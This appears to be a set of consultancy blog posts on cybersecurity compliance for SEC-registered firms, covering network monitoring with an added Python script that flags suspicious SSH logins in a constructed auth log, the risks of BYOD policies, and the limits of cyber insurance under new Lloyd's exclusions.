  7. Monitor Your Network for Suspicious Activity
    Your seventh and final step is continuous monitoring of your network for suspicious activity using both automated tools (e.g., intrusion detection systems) and manual processes (e.g., periodic reviews of system logs and vulnerability scans). This will help you detect malicious activity quickly so you can take steps to contain any damage caused by a breach.
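As an added example of the monitoring in step 7 (and of the “logins from unfamiliar IP addresses” check in the earlier Top 5 post), the script below runs three detections over sshd-style auth log lines: a successful login from outside the firm’s known networks, a success that follows a burst of failures from the same address, and a user logging in from an address not in that user’s baseline. The log lines, network ranges and baseline are constructed; this is example code written for this page, not from the original post.

```python
"""Three detections over sshd-style authentication log lines.

Added example; not code from the original post. Flags (1) a successful
login from outside the firm's known networks, (2) a success that follows a
burst of failures from the same source address, and (3) a user logging in
from an address not in that user's baseline. Networks, baseline and log
lines are constructed for illustration.
"""
import ipaddress
import re
from collections import defaultdict
from datetime import datetime

# Constructed: office LAN and the VPN concentrator's egress range.
KNOWN_NETWORKS = [ipaddress.ip_network(n) for n in ("10.20.0.0/16", "203.0.113.0/24")]
# Constructed: addresses each user logged in from over the prior 90 days.
BASELINE = {"jsmith": {"10.20.4.17"}, "svc-backup": {"10.20.9.2"}}
FAIL_THRESHOLD = 5      # failures from one address before a success is suspicious
WINDOW_SECONDS = 600    # look-back window for those failures

LINE_RX = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse(line: str, year: int = 2023):
    """Parse one sshd line into a dict, or None if it is not an auth result."""
    m = LINE_RX.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")  # syslog omits the year
    return {"ts": ts, "ok": m["result"] == "Accepted", "user": m["user"], "ip": m["ip"]}


def detect(lines, known=KNOWN_NETWORKS, baseline=BASELINE) -> list[str]:
    """Return human-readable alerts for suspicious successful logins."""
    alerts = []
    failures = defaultdict(list)  # source ip -> timestamps of failed attempts
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        ip, ts, user = ev["ip"], ev["ts"], ev["user"]
        if not ev["ok"]:
            failures[ip].append(ts)
            continue
        when = f"{ts:%b %d %H:%M}"
        addr = ipaddress.ip_address(ip)
        if not any(addr in net for net in known):
            alerts.append(f"{when} {user} accepted from {ip}: outside known networks")
        recent = [t for t in failures[ip] if (ts - t).total_seconds() <= WINDOW_SECONDS]
        if len(recent) >= FAIL_THRESHOLD:
            alerts.append(f"{when} {user} accepted from {ip} after {len(recent)} failures "
                          f"in {WINDOW_SECONDS // 60} min")
        if user in baseline and ip not in baseline[user]:
            alerts.append(f"{when} {user} accepted from {ip}: not in user's baseline")
        failures[ip].clear()  # a success resets the counter for that address
    return alerts


# Constructed auth log: a normal morning login, a brute-force run from an
# unknown address that eventually succeeds, and a service account appearing
# from a VPN address it has never used before.
SAMPLE_LOG = """\
Jan 10 08:55:02 bastion sshd[2201]: Accepted publickey for jsmith from 10.20.4.17 port 50122 ssh2
Jan 10 09:12:01 bastion sshd[2310]: Failed password for jsmith from 198.51.100.23 port 51234 ssh2
Jan 10 09:12:04 bastion sshd[2311]: Failed password for jsmith from 198.51.100.23 port 51235 ssh2
Jan 10 09:12:07 bastion sshd[2312]: Failed password for jsmith from 198.51.100.23 port 51236 ssh2
Jan 10 09:12:11 bastion sshd[2313]: Failed password for invalid user admin from 198.51.100.23 port 51237 ssh2
Jan 10 09:12:15 bastion sshd[2314]: Failed password for jsmith from 198.51.100.23 port 51238 ssh2
Jan 10 09:12:40 bastion sshd[2315]: Accepted password for jsmith from 198.51.100.23 port 51240 ssh2
Jan 10 11:30:19 bastion sshd[2402]: Accepted publickey for svc-backup from 10.20.9.2 port 40011 ssh2
Jan 10 23:41:55 bastion sshd[2519]: Accepted publickey for svc-backup from 203.0.113.88 port 40312 ssh2
"""

if __name__ == "__main__":
    for a in detect(SAMPLE_LOG.splitlines()):
        print("ALERT", a)
```

The same three rules translate directly to Windows security events (4625 followed by 4624 from one source, logon from an address outside the VPN range) or to a SaaS provider’s sign-in log; the baseline is the part most firms skip, and it is what turns “a login happened” into “a login happened from somewhere this user has never been”.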

Following these seven steps will help your firm achieve compliance with the SEC regulations on cybersecurity—and make your organization more secure in the process! If you need assistance implementing any of these steps, MTradecraft would be happy to help!

Webinar Recording: A Discussion on BYOD Policies at SEC Registered Firms.

In this webinar we discuss the dangers of Bring Your Own Device (BYOD) policies for SEC registered firms. BYOD policies can be a major security risk for firms as they open up the possibility for sensitive data to be accessed and stolen by malicious actors.

I’m not here to sell you a solution. There isn’t one. This is just the opinion of someone who has worn the CCO and COO hat for years, and now works as an ethical hacker having performed over 200 security audits and penetration tests against SEC registered firms.

Bring Your Own Device Policies are a Total Nightmare for SEC Registered Firms

Allowing employees to use their own personal devices for work is a stupid idea for all SEC registered firms.

TLDR: Do not allow a BYOD policy at your firm.

The first thing I hear from CCOs is “But our MSP (Managed Service Provider) has set up an MDM (Mobile Device Management) solution.”

My answer is always, “No, your MSP sold you on an MDM solution that doesn’t solve your compliance obligations.”

MDM software can help with most of the issues below, but I have yet to see one that can meet the compliance requirements of SEC-registered firms in a compliant way. For you legal nerds out there, we are looking at Advisers Act Rule 204-2 (Books and Records Rule) and 206(4)-7 (Compliance Rule) in terms of maintaining compliant communications records. 206(4)-9 will also touch on this when it hits the books in April 2023.

If your SEC-registered firm decides to allow employees to use their personal mobile devices for work purposes, you should be aware of the following risks:

1. Data theft

If you allow your personnel to use their own devices unchecked, it is likely that some of the personal programs they use will not be as stringent about security standards. A personal account, if it is hacked, may eventually lead to corporate data and sensitive information being revealed.

2. Malware

Employees use personal devices to download various types of information and files, such as PDFs, applications, and um… porn. Corporate data security is at risk if employees aren’t able to discern between work-related and personal data. Games and porn downloaded or viewed on mobile devices are often associated with hidden viruses or malware, for example. If an employee logs into the company network from their infected device, the entire system could be jeopardized by passing the malware along to work systems.

3. Legal problems

A business’s reputation may be destroyed in the event of a security breach. If an employee-owned device results in a leak or breach of corporate data, this might result in serious consequences, such as potential litigation.

Working with legal counsel to develop sound policies is crucial for protecting your organization from costly and potentially devastating lawsuits, especially if you decide to allow a BYOD policy.

4. Lost or stolen devices

In the best case, a worker’s device being stolen or going missing is merely an inconvenience. In the worst-case scenario, you’re dealing with a catastrophic disaster. Loss or theft of the employee’s device might result in a major breach if they weren’t following corporate security standards when using it. For example, the employee may store their passwords (both personal and business) in an unsecured notes program, making it easy for someone who obtains the device to breach corporate accounts.

Even if the employee followed the policy to the letter, hacking/cracking technology has advanced so much in recent years that a strong password or fingerprint verification may not be enough to keep an attacker out of the device. Mobile device management (MDM) software might help businesses solve this issue by allowing them to remotely erase devices so hackers don’t have a chance to steal sensitive data. On the other hand, MDM software is extremely invasive of an employee’s privacy (see #8).

5. Improper mobile management

A staff member leaving an organization creates a potential security vulnerability if they still have access to company data on their personal mobile devices. To prevent an employee from continuing to access systems or apps after they leave the company, companies must be able to reset passwords and revoke access immediately. If a security breach does occur, tracking down the device responsible should also be possible. If you just fired an employee, do you think they would be willing to cooperate? Hell no.

6. Insufficient employee training

Many security breaches are caused by carelessness or human error. Most of the time, this occurs when an employee is unaware of their company’s policy on security, especially regarding devices. When you’re training employees in device security, think about the best way to communicate the information to them. If you need a training program, I highly recommend you check out a free training program called FieldCraft. It is compliant with SEC and FINRA regulations, and we offer a no-BS free version to firms with fewer than 10 employees.

7. Shadow IT

Shadow IT is where company employees use technology that is not approved or managed by the company’s IT department, and it is becoming a big problem in many businesses. When employees bring in consumer-grade technologies and goods without the supervision or management of their IT department or MSP, a slew of issues can result. Any software or hardware an employee introduces without your review or approval poses a potential hazard, whether it’s a USB drive with potential malware on it or an open-source program with low-security standards.

8. Invasion of Privacy

If you are an SEC-registered business, you must keep track of and record all communications with clients. If you allow your employees to text message your clients, you must monitor all of their text message conversations. There is no automated method for telling whether an employee’s text message is intended for a friend or family member versus a client. As a result, you must keep track of them all. No, thanks.

Your Cybersecurity Insurance is Absolutely Worthless…and it will get worse.

To be clear, I am not trying to sell you a policy. I don’t sell policies. And, I don’t have a recommendation for a policy. I don’t have a solution for you because every policy I have seen is worthless.

Which is why I always say….

“Your cybersecurity insurance policy is absolutely worthless, but I would never want to go through an SEC audit or examination without one”.

This is a line I have been toeing for years. I have covered the topic in several webinars. A recording of the latest is below.

Now, it is going to get worse…

Starting 31 March 2023, insurance companies will require all standalone cyber attack policies to include a clause excluding liability for losses arising from state-backed cyber attacks. This is in addition to the “war” clause that already exists and is so problematic.

The new clause will exclude any losses due to a war–declared or not–even if the policy has a separate war exclusion. In addition, it must also exclude any losses arising from state-sponsored cyberattacks that disable a firm’s ability to function properly.

Furthermore, the contracts will now have a stipulation on whether cover excludes IT systems not located in the country “under attack”, and it should set a clear standard for how the involved parties will reach an agreement if any state-sponsored cyberattack originates from one or more countries.

Lloyd’s has noted the evolving risk of cyber-related business, warning that if it is not managed properly, it could lead to significant losses for syndicates that would be difficult to recover from.

“The ability of hostile actors to easily disseminate an attack, the ability for harmful code to spread, and the critical dependency that societies have on their IT infrastructure, including to operate physical assets, means that losses have the potential to greatly exceed what the insurance market is able to absorb,” Lloyd’s added.

MTradecraft agrees. Especially considering that the large majority of FinTech providers have a widespread footprint and little to no cybersecurity budget.

Lloyd’s stated that it is aware many managing agents already have clauses specifically excluding war and non-war state-sponsored cyber-attacks, but they need to be of a high standard with solid wordings.

“We consider the complexities that can arise from cyber-attack exposures in the context of war or non-war, state-backed attacks means that underwriters should ensure that their wordings are legally reviewed to ensure they are sufficiently robust,” said Lloyd’s.

Starting March 31, 2023, this new requirement will go into effect for every policy–both at its inception and at renewal. Note that this coincides with the SEC’s new cyber regulations known as 206(4)-9.

So again, please understand your cybersecurity policy is worthless. Unfortunately, the SEC and your clients expect you to have coverage.

Your only defense is to do your required cyber audits (SEC 206(4)-9) so that you patch systems, plug open ports, train your employees, and manage your vulnerabilities before they are discovered by malicious hackers…or your insurance company.